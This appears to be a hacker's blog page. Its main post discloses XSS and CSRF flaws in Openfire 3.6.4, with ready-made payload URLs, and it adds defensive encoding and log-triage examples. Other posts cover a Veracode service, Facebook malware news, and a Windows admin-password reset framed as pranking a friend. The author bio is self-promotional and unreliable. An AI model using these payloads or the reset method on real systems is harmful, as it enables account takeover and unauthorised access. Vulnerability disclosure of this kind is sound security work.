
Author

Amol Bhure (ultra l33t) was born in Maharashtra, Seventh July Of Nineteen Hundred Nineteen Ninety A.D. He's currently pursuing his B.E. in Bangalore. A cyber security professional, hacker, designer and programmer. He has a keen interest in hacking and network security, and he has developed several techniques of defending and defacing websites. He's of the opinion that people should learn this art to prevent any cyber attacks. Currently Amol works as a member of 'Null International', Bangalore chapter, as a network security guy. Apart from this, he has done internships at YAHOO! India, AMAZON India, etc. He has also attended various international conferences like NullCon GOA, c0c0n, ClubHack, Defcon, SecurityByte, ICFoCS, OWASP, etc. He is certified with RHCE, LPT, CEH v7, SCJP, AFCEH. In programming he knows C, C++, C#, JAVA (SCJP), .NET, and PHP. Additionally he knows a few hardware languages like HDL, VHDL, Verilog, and embedded microcontroller programming. He has been featured on the Google hall of fame. Amol was named an "India's top 10 hacker" by Google. "World's top 50 hacking blog" by Google.


Saturday, February 19, 2011

Multiple XSS and XSRF issues in Openfire 3.6.4

I recently (read: last month) disclosed several security issues with Ignite Realtime's Openfire v3.6.4. The following links are the original advisory postings and the exploit code:
http://www.securityfocus.com/bid/45682
http://secunia.com/advisories/42799
http://packetstormsecurity.org/files/author/8144/
http://www.exploit-db.com/exploits/15918/

The following is the condensed disclosure document for the vulnerabilities:
Title: Multiple XSS and CSRF Vulnerabilities in Openfire 3.6.4 Administrative Section
--------------------------------------------------------------------

Project: Openfire
Severity: High
Versions: 3.6.4 (other versions may be affected)
Exploit type: Multiple XSS and CSRF
Fixes Available: None
--------------------------------------------------------------------

Timeline:
14 October 2010: Vendor Contacted
15 October 2010: Vendor Response received. Asks to verify the issues in beta.
28 October 2010: Informed Vendor that multiple pages are still vulnerable
03 November 2010: Acknowledgement / Update requested
03 November 2010: Update received. No fixes initiated.
23 November 2010: Informed vendor disclosure date set to 1/12/2010
22 December 2010: Update requested.
22 December 2010: Vendor asks to release information as the vulnerabilities are already known
23 December 2010: A different contact at the Vendor location informs that there are no updates.
24 December 2010: Disclosure date set to 5 January 2011
05 January 2011: Disclosed to the Security Community via Bugtraq, Full disclosure and Secunia
--------------------------------------------------------------------

Product Description:
Openfire is a real time collaboration (RTC) server licensed under the Open Source GPL. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Openfire is incredibly easy to setup and administer, but offers rock-solid security and performance.
(Source: http://www.igniterealtime.org/projects/openfire/)
--------------------------------------------------------------------

Affected Files/Locations/Modules:
XSS:
login.jsp
security-audit-viewer.jsp
user-create.jsp
plugins/search/advance-user-search.jsp
user-roster-add.jsp
user-roster.jsp
group-create.jsp
group-edit.jsp
group-delete.jsp
muc-room-edit-form.jsp
muc-room-delete.jsp
plugins/clientcontrol/create-bookmark.jsp
plugins/clientcontrol/spark-form.jsp

CSRF:
user-create.jsp
user-password.jsp
user-delete.jsp
group-create.jsp
group-edit.jsp
group-delete.jsp

---------------------------------------------------------------------

Vulnerability Details:
A user can insert HTML or execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities arise from insufficient input validation in multiple input fields throughout the application.
Successful exploitation of these vulnerabilities could result in, but is not limited to, compromise of the application, theft of cookie-based authentication credentials, arbitrary URL redirection, disclosure or modification of sensitive data, and phishing attacks.

Since the vulnerabilities exist in the administrative module, a successful attack could cause a complete compromise of the entire application.

An attacker can also force a user into executing functions that add/delete/modify users and groups without the knowledge of the user.
----------------------------------------------------------------------

Proof of Concept:
Persistent XSS:
http://target-url/login.jsp?url=&username=test" onfocus=javascript:window.location.assign('http://www.google.com');">

http://target-url/login.jsp?url=hello" onfocus=javascript:window.location.assign('http://www.google.com');">

http://target-url/security-audit-viewer.jsp?range=15&username="><script>alert('xss')</script>&search=Search

http://target-url/user-create.jsp?username=test"><script>alert('xss')</script>
http://target-url/user-create.jsp?name=test"><script>alert('xss')</script>
http://target-url/user-create.jsp?email=test"><script>alert('xss')</script>

http://target-url/plugins/search/advance-user-search.jsp?criteria=test"><script>alert('xss')</script>

http://target-url/user-roster-add.jsp?username=test<script>alert('xss')</script>
http://target-url/user-roster-add.jsp?username=user&jid=1&nickname=<script>alert('XSS')</script>&email=<script>alert('XSS')</script>&add=Add+Item

http://target-url/user-roster.jsp?username=test<script>alert(document.cookie)</script>
http://target-url/user-lockout.jsp?username=test<script>alert('xss')</script>

http://target-url/group-create.jsp?name=test<script>alert('xss')</script>&description=<script>alert('xss')</script>&create=Create+Group

http://target-url/group-edit.jsp?creategroupsuccess=true&group=test<script>alert('xss')</script>

http://target-url/group-delete.jsp?group=<script>alert('xss')</script>


http://target-url/muc-room-edit-form.jsp?save=true&create="><script>alert('XSS')</script>&roomconfig_persistentroom="><script>alert('XSS')</script>&roomName=23&mucName=conference&roomconfig_roomname=<script>alert('XSS')</script>&roomconfig_roomdesc=<script>alert('XSS')</script>&room_topic=<script>alert('XSS')</script>&roomconfig_maxusers="><script>alert('XSS')</script>&roomconfig_presencebroadcast=<script>alert('XSS')</script>true&roomconfig_presencebroadcast2="><script>alert('XSS')</script>&roomconfig_presencebroadcast3=true"><script>alert('XSS')</script>&roomconfig_roomsecret="><script>alert('XSS')</script>&roomconfig_roomsecret2="><script>alert('XSS')</script>&roomconfig_whois=moderator"><script>alert('XSS')</script>&roomconfig_publicroom=true"><script>alert('XSS')</script>&roomconfig_canchangenick=true"><script>alert('XSS')</script>&roomconfig_registration=true"><script>alert('XSS')</script>&Submit=Save+Changes

http://target-url/muc-room-delete.jsp?roomJID="><script>alert('XSS')</script>&create=false

http://target-url/plugins/clientcontrol/create-bookmark.jsp?urlName="><script>alert('XSS')</script>&url="><script>alert('XSS')</script>&users="><script>alert('XSS')</script>&groups="><script>alert('XSS')</script>&rss=off&createURLBookmark=Create&type=url

http://target-url/plugins/clientcontrol/spark-form.jsp?optionalMessage=</textarea><script>alert('XSS')</script>&submit=Update+Spark+Versions
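
The login.jsp proof of concept above carries no script tag: it closes the value attribute with a double quote and adds an event handler. The following added example (not code from the advisory or from Openfire; the input template and the function names are assumptions) renders that value with three encoders and parses the result, showing that escaping only angle brackets still lets the handler through while attribute-context encoding does not.

```python
from html import escape
from html.parser import HTMLParser

# Constructed stand-in for a page fragment that echoes ?username= back into a
# quoted value attribute (assumed shape; not Openfire's actual JSP source).
TEMPLATE = '<input type="text" name="username" value="{value}">'

# The username value from the login.jsp proof of concept in this advisory.
POC_VALUE = "test\" onfocus=javascript:window.location.assign('http://www.google.com');\">"

def encode_none(value):
    """Vulnerable behaviour: the parameter is echoed unchanged."""
    return value

def encode_tags_only(value):
    """Incomplete fix: neutralises tags but leaves quotes intact."""
    return value.replace("<", "&lt;").replace(">", "&gt;")

def encode_attribute(value):
    """Output encoding for a quoted attribute: &, <, >, " and ' are escaped."""
    return escape(value, quote=True)

class AttrCollector(HTMLParser):
    """Records the attributes an HTML parser sees on each <input> tag."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))

def render_and_inspect(encoder, value=POC_VALUE):
    """Render the field with `encoder`; return (injected handlers, value seen)."""
    parser = AttrCollector()
    parser.feed(TEMPLATE.format(value=encoder(value)))
    parser.close()
    attrs = parser.inputs[0]
    handlers = sorted(name for name in attrs if name.startswith("on"))
    return handlers, attrs.get("value")

if __name__ == "__main__":
    for enc in (encode_none, encode_tags_only, encode_attribute):
        print(enc.__name__, render_and_inspect(enc))
```

With the attribute encoder the parser sees no event handler and the whole submitted string stays inside the value attribute as inert text.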


Stored XSS:
http://target-url/group-create.jsp
http://target-url/group-summary.jsp
Method: Navigate to http://target-url/group-create.jsp, and create a new group with the following details.
Group Name: Test<script>alert("xss")</script>
Description: Test<script>alert("xss")</script>
Click on Create Group, you will be greeted with multiple alert boxes. Click on Group Summary from the left pane or navigate to http://target-url/group-summary.jsp to be greeted again by multiple alert boxes completing the PoC.


CSRF:
For the following links, create HTML pages containing image tags whose src= attribute is set to each of the following links, and ask the user to view these pages. If a user is logged into Openfire's admin console and views the HTML pages, the respective functions are called:
http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User
http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password
http://target-url/user-delete.jsp?username=tester&delete=Delete+User
http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group
http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add
http://target-url/group-edit.jsp?group=NewGroup&admin=abc@example.com&updateMember=Update
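
One way to look for the CSRF pattern described above in request logs, as an added example that is not part of the original advisory: it flags GET requests to the pages in the CSRF proof of concept that carry the action parameter and whose Referer is not the admin console itself. The combined log format, the host name openfire.example:9090 and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Pages and action parameters taken from the CSRF proof-of-concept URLs above.
# group-delete.jsp is listed as affected, but the page gives no action
# parameter for it, so it is left out here.
CSRF_PAGES = {
    "/user-create.jsp": {"create"},
    "/user-password.jsp": {"update"},
    "/user-delete.jsp": {"delete"},
    "/group-create.jsp": {"create"},
    "/group-edit.jsp": {"addbutton", "updateMember"},
}

# Request line, status, size and Referer of a combined-format log entry.
LINE_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)

# Constructed sample lines (assumed to come from a proxy in front of the console).
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jan/2011:10:00:01 +0000] "GET /user-create.jsp?username=tester&password=test&passwordConfirm=test&isadmin=on&create=Create+User HTTP/1.1" 200 512 "http://forum.example.net/thread/42" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Jan/2011:10:00:09 +0000] "GET /user-summary.jsp HTTP/1.1" 200 9001 "http://openfire.example:9090/index.jsp" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Jan/2011:10:01:30 +0000] "GET /group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add HTTP/1.1" 200 700 "http://openfire.example:9090/group-edit.jsp?group=NewGroup" "Mozilla/5.0"',
    '10.0.0.7 - - [05/Jan/2011:10:02:44 +0000] "GET /user-delete.jsp?username=tester&delete=Delete+User HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]


def triage(lines, console_host):
    """Return (page, action params, referer host) for suspicious state-changing GETs."""
    findings = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m or m["method"] != "GET":
            continue
        url = urlsplit(m["target"])
        actions = CSRF_PAGES.get(url.path, set()) & set(parse_qs(url.query))
        ref_host = urlsplit(m["referer"]).netloc
        # A same-host Referer is what a click inside the console produces.
        if actions and ref_host != console_host:
            findings.append((url.path, sorted(actions), ref_host or "(no referer)"))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG, "openfire.example:9090"):
        print(finding)
```

A missing Referer is reported as well, since the request still changed state through a GET; treat those hits as lower confidence than a foreign Referer.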

Tuesday, February 1, 2011

Free XSS flaws detection service..!!

Cross-site scripting (XSS) errors are responsible for more than half of all web application vulnerabilities. So, in this age of accountability and expectations for secure, high quality software, what’s being done about it?

Veracode announced their Free XSS Detection Service which empowers global developers and security professionals to quickly and easily identify dangerous and costly XSS vulnerabilities, while offering remediation recommendations to produce higher security web applications.

OWASP includes XSS on its list of the Top 10 most dangerous software risks, and despite the high prevalence, Veracode is certain that XSS vulnerabilities can be easily eliminated once detected.

Veracode Free XSS Detection Service removes perceived complexity from the detection process, and with access to proper education and training, developers can avoid introducing the flaws into software in the first place.

According to OWASP, XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser that can hijack user sessions, deface web sites, or redirect the user to malicious sites.

Here’s how the Veracode Free XSS Detection Service works:

    * Sign up for a Free XSS Detection Service account
    * Users submit one Java application, free of charge
    * The Veracode platform will search for XSS errors and produce a detailed report with location and remediation information
    * Participants will also receive complimentary access to Veracode’s dedicated XSS eLearning courses.

“At Veracode, we see thousands — sometimes tens of thousands — of XSS vulnerabilities a week. Many are those we describe as ’trivial’ and can be fixed with a single line of code. Some of our customers upload a new build the following day; others never do. Motivation is clearly a factor,” said Chris Eng, senior director of security research, Veracode.

“Think about the XSS vulnerabilities that hit highly visible websites such as Facebook, Twitter, MySpace and others. Sometimes those companies push XSS fixes to production in a matter of hours. Are their developers really that much better? Of course not. The difference is how seriously the business takes it. When they believe it’s important, you can bet it gets fixed.”

@mol

New malware strains wreaking havoc on Facebook..!!






PandaLabs announced the discovery of security exploits via popular social media sites Facebook and Twitter. In the last several days, two new malware strains have been wreaking havoc on Facebook users.

The first, Asprox.N, is a Trojan delivered via email informing users their Facebook account is being used to distribute spam and that, for security reasons, the login credentials have been changed.

The email includes a fake Word document attachment, supposedly containing the new password, with an unusual icon and the filename Facebook_details.exe.

To deceive victims, a .doc file opens when the attachment is run, but the file is really a Trojan that downloads another file designed to open all available ports, connecting to mail service providers in an attempt to spam as many users as possible.

The second new malware strain, Lolbot.Q, is distributed across instant messaging applications such as AIM or Yahoo!, with a message displaying a malicious link.

Clicking the link downloads a worm designed to hijack Facebook accounts, blocking users' access while informing them that the account has been suspended.

To "reactivate" their account, users are asked to complete a questionnaire, promising prizes such as laptops and iPads. After several questions, users are asked to subscribe and enter their cell phone number, which is in turn charged a fee of $11.60 per week.

Victims can restore access to their Facebook account only once they subscribe to the service and receive a new password.

"Once again cybercriminals are using social engineering to trick victims and infect them with malware," said Luis Corrons, technical director of PandaLabs. "Given the increasing popularity of social media, it is no surprise that it is being exploited to lure victims."

Hack Windows 7 administrator password



There can be various situations where you get stuck because you have forgotten the admin account password, or you want to play around with your friend. There are various tutorials and bootable Linux flavours available for cracking the password, but I have selected the simplest and smallest loader for you to work with.
Note that there is no way to determine the old password, but you can reset it to a new password.

Offline NT Password & Registry Editor

I have tested this software on all the current versions of Windows 7, Windows Vista and on Windows Server 2008. The download is an ISO image of the setup. Read the readme.txt file for more installation instructions.

You can also make a bootable pendrive and boot from it.

Overview

  1. Get the machine to boot from CD.
  2. Load drivers (usually automatic, but possible to run manual select)
  3. Disk select, tell which disk contains the Windows system. Optionally you will have to load drivers.
  4. PATH select, where on the disk is the system?
  5. File select, which parts of registry to load, based on what you want to do.
  6. Password reset or other registry edit.
  7. Write back to disk (you will be asked)